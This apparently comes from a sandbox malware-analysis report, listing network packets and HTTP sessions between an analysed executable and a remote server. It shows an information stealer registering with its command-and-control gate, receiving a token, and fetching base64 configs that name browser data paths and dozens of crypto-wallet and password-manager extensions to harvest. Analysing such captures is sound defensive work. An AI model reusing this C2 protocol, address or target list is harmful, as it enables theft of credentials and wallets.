Aug 29, 2024 15:42:59.240080118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240088940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240088940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240099907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240107059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240113020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240138054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240228891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240425110 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240434885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240443945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240453005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240463972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240473986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240495920 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240497112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240497112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240506887 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240515947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240520954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240525007 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240580082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.706706047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.706753016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.770903111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.770915031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:00.735932112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:00.736016035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:00.801202059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:00.806133986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:01.045479059 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:01.045499086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:01.045511007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:01.045597076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:01.045625925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:01.170803070 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:01.175767899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:01.562764883 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:01.562941074 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:01.576001883 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:01.580810070 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.355930090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.355983019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:02.383411884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:02.388377905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.628546953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.628587008 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.628599882 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.628622055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.628623009 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:02.628634930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.628648996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.628655910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:02.628655910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:02.628663063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:02.628684044 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:02.628726006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:02.630100012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:02.634880066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:03.444525957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:03.444861889 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:08.452835083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:43:08.453005075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:43:09.951498032 CEST	49704	80	192.168.2.5	185.215.113.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 15:43:04.383594990 CEST	53	63199	1.1.1.1	192.168.2.5

HTTP Request Dependency Graph

185.215.113.100

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.100	80	2888	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 15:42:46.519942045 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Aug 29, 2024 15:42:47.259485960 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:47 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 29, 2024 15:42:47.262902975 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFC Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 37 45 33 46 32 34 33 39 43 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 2d 2d 0d 0a Data Ascii: ------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="hwid"57E3F2439C901942779736------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="build"leva------AEHIJDAFBKFHIDGCFBFC--
Aug 29, 2024 15:42:47.521785975 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:47 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 47 4d 33 59 6a 64 6b 59 7a 5a 68 59 54 56 69 4e 6a 4d 79 4e 6a 4d 33 4d 54 6b 7a 4e 6d 56 6a 59 54 41 79 4d 44 45 33 4d 54 6b 7a 4d 57 4d 30 4e 6d 59 35 59 54 4d 79 59 7a 45 34 5a 44 41 30 5a 47 51 78 59 7a 55 7a 4e 6a 59 7a 4f 47 4a 6d 4f 44 45 33 59 57 4d 33 59 6a 56 68 5a 54 51 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MGM3YjdkYzZhYTViNjMyNjM3MTkzNmVjYTAyMDE3MTkzMWM0NmY5YTMyYzE4ZDA0ZGQxYzUzNjYzOGJmODE3YWM3YjVhZTQ2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Aug 29, 2024 15:42:47.523775101 CEST	470	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDA Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 2d 2d 0d 0a Data Ascii: ------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="message"browsers------FHIIEHJKKECGCBFIIJDA--
Aug 29, 2024 15:42:47.766781092 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:47 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Aug 29, 2024 15:42:47.766808987 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Aug 29, 2024 15:42:47.768364906 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBA Host: 185.215.113.100 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 2d 2d 0d 0a Data Ascii: ------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="message"plugins------EHJDGCBGDBKJKFHIECBA--
Aug 29, 2024 15:42:48.013556957 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:47 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Aug 29, 2024 15:42:48.013573885 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Aug 29, 2024 15:42:48.013583899 CEST	328	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Aug 29, 2024 15:42:48.013595104 CEST	1236	IN	Data Raw: 51 6d 39 34 66 47 31 75 5a 6d 6c 6d 5a 57 5a 72 59 57 70 6e 62 32 5a 72 59 32 70 72 5a 57 31 70 5a 47 6c 68 5a 57 4e 76 59 32 35 72 61 6d 56 6f 66 44 46 38 4d 48 77 77 66 46 52 6c 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 6c 71 61 57 Data Ascii: Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB
Aug 29, 2024 15:42:48.013637066 CEST	1236	IN	Data Raw: 5a 32 35 73 62 57 70 6c 5a 57 64 71 59 57 64 73 62 57 56 77 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d Data Ascii: Z25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ
Aug 29, 2024 15:42:48.013648987 CEST	448	IN	Data Raw: 61 33 77 77 66 44 42 38 4d 58 78 55 63 6e 56 7a 64 43 42 58 59 57 78 73 5a 58 52 38 5a 57 64 71 61 57 52 71 59 6e 42 6e 62 47 6c 6a 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d Data Ascii: a3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFd
Aug 29, 2024 15:42:48.013890982 CEST	1236	IN	Data Raw: 52 47 56 47 61 53 42 58 59 57 78 73 5a 58 52 38 5a 47 35 6e 62 57 78 69 62 47 4e 76 5a 47 5a 76 59 6e 42 6b 63 47 56 6a 59 57 46 6b 5a 32 5a 69 59 32 64 6e 5a 6d 70 6d 62 6d 31 38 4d 58 77 77 66 44 42 38 52 6e 4a 76 62 6e 52 70 5a 58 49 67 56 32 Data Ascii: RGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9
Aug 29, 2024 15:42:48.013902903 CEST	388	IN	Data Raw: 62 47 4a 76 59 32 4e 6b 5a 32 4e 6a 5a 57 74 77 61 32 4e 69 61 57 35 38 4d 58 77 77 66 44 42 38 55 32 46 6d 5a 56 42 68 62 43 42 58 59 57 78 73 5a 58 52 38 59 58 42 6c 62 6d 74 6d 59 6d 4a 77 62 57 68 70 61 47 56 6f 62 57 6c 6f 62 6d 52 74 62 57 Data Ascii: bGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE1
Aug 29, 2024 15:42:48.015831947 CEST	470	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGII Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 2d 2d 0d 0a Data Ascii: ------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; 